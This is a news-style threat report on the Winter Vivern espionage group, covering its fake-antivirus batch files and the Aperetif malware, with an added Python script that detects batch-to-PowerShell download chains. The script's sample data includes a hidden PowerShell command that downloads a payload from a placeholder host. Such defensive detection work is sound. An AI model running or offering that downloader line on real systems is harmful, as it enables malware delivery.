An advanced hacking group known as 'Winter Vivern' is targeting European government organizations and telecommunications service providers to conduct espionage.
Since this group's activities align with the interests of the Russian and Belarusian governments, it is presumed to be a pro-Russian APT (advanced persistent threat) group.
According to SentinelLabs, the threat group operates with limited resources; however, their creativity compensates for these constraints.
Winter Vivern was first observed targeting government organizations in Lithuania, Slovakia, the Vatican, and India in 2021, according to DomainTools.
In recent campaigns, SentinelLabs has observed the hackers targeting individuals working in the governments of Poland, Italy, Ukraine, and India. In addition to high-profile state targets, the group has targeted telecommunications companies, such as those that have been supporting Ukraine since Russia's invasion.
Beginning in early 2023, the hackers imitated the websites of Poland's Central Bureau for Combating Cybercrime, the Ukraine Ministry of Foreign Affairs, and the Ukrainian Security Service. These sites send malicious files to visitors who arrive after clicking on links in malicious emails.
SentinelLabs has previously observed spreadsheet files (XLS) containing malicious macros that launch PowerShell being hosted on the APT's cloned sites.
Using bogus virus scanners
In the SentinelLabs report, one example of Winter Vivern's resourcefulness is the use of Windows batch files that impersonate antivirus scanners while downloading malicious payloads. The malicious files pretend to run an antivirus scan, displaying a percentage of the remaining scan time, while quietly downloading a malicious payload via PowerShell.
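The fake-scanner technique described above leaves a recognisable process chain on the endpoint: cmd.exe running a .bat file spawns PowerShell with a download cmdlet or an encoded command. The following detection logic is an added example, not code from the SentinelLabs or CERT-UA reports; the event fields, file names and URL are constructed assumptions in the style of a generic process-creation log.

```python
# Added example (not from the SentinelLabs or CERT-UA reports): flag a batch
# file run under cmd.exe that spawns PowerShell to fetch a payload. Event
# fields follow a generic process-creation log (Sysmon event 1 style); the
# sample events below are constructed for illustration.
import re

# PowerShell cmdlets/.NET calls used to fetch remote content, plus the
# encoded-command switches that hide such a call behind base64.
DOWNLOAD_PATTERNS = re.compile(
    r"invoke-webrequest|\biwr\b|invoke-restmethod|\birm\b|downloadstring|"
    r"downloadfile|net\.webclient|start-bitstransfer", re.IGNORECASE)
ENCODED_FLAG = re.compile(r"\s-(e|ec|enc|encodedcommand)\b", re.IGNORECASE)

def is_batch_host(event):
    """True when the process is cmd.exe executing a .bat/.cmd script."""
    return (event["image"].lower().endswith("cmd.exe")
            and re.search(r"\.(bat|cmd)\b", event["command_line"], re.I) is not None)

def is_powershell_download(event):
    """True when the process is PowerShell with a download or encoded command."""
    if not event["image"].lower().endswith(("powershell.exe", "pwsh.exe")):
        return False
    cmd = event["command_line"]
    return bool(DOWNLOAD_PATTERNS.search(cmd) or ENCODED_FLAG.search(cmd))

def find_fake_scanner_chains(events):
    """Return (cmd_pid, powershell_pid) pairs where a batch script spawned a
    PowerShell downloader; batch jobs with other children are ignored."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        parent = by_pid.get(e["parent_pid"])
        if parent and is_batch_host(parent) and is_powershell_download(e):
            hits.append((parent["pid"], e["pid"]))
    return hits

# Constructed sample: one fake "scanner" chain and one legitimate backup job.
SAMPLE_EVENTS = [
    {"pid": 200, "parent_pid": 100, "image": r"C:\Windows\System32\cmd.exe",
     "command_line": r'cmd.exe /c "C:\Users\u\Downloads\Antivirus_Scan.bat"'},
    {"pid": 201, "parent_pid": 200, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r'powershell.exe -w hidden -c "iwr http://example.invalid/p -OutFile $env:TEMP\p.exe"'},
    {"pid": 300, "parent_pid": 100, "image": r"C:\Windows\System32\cmd.exe",
     "command_line": r'cmd.exe /c "C:\Scripts\backup.bat"'},
    {"pid": 301, "parent_pid": 300, "image": r"C:\Windows\System32\robocopy.exe",
     "command_line": r"robocopy D:\ E:\ /MIR"},
]

if __name__ == "__main__":
    for cmd_pid, ps_pid in find_fake_scanner_chains(SAMPLE_EVENTS):
        print(f"suspicious batch->PowerShell download chain: cmd {cmd_pid} -> powershell {ps_pid}")
```

Legitimate batch scripts that call PowerShell downloaders do exist, so tune the allow-list of script paths before alerting on every hit.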
The payload delivered through this process is known as "Aperetif," and it was detailed in a February 2023 report by the Ukrainian CERT. The malware is hosted on infected WordPress websites, which are frequently used in malware distribution campaigns.
The Aperetif malware can automatically scan and exfiltrate files, take screenshots, and send all data in a base64-encoded format to a hardcoded command and control server URL (marakanas[.]com). SentinelLabs recently discovered a new payload used by Winter Vivern that appears to be functionally similar to Aperetif, but its design is incomplete, indicating that it is still in development.
In both cases, the malware beacons to the C2 using PowerShell and waits for instructions or additional payloads, and the two payloads overlap in their deployment. To summarise, Winter Vivern is a group that uses a relatively simple yet effective method to trick its victims into downloading malicious files. At the same time, their low profile has allowed them to remain unnoticed.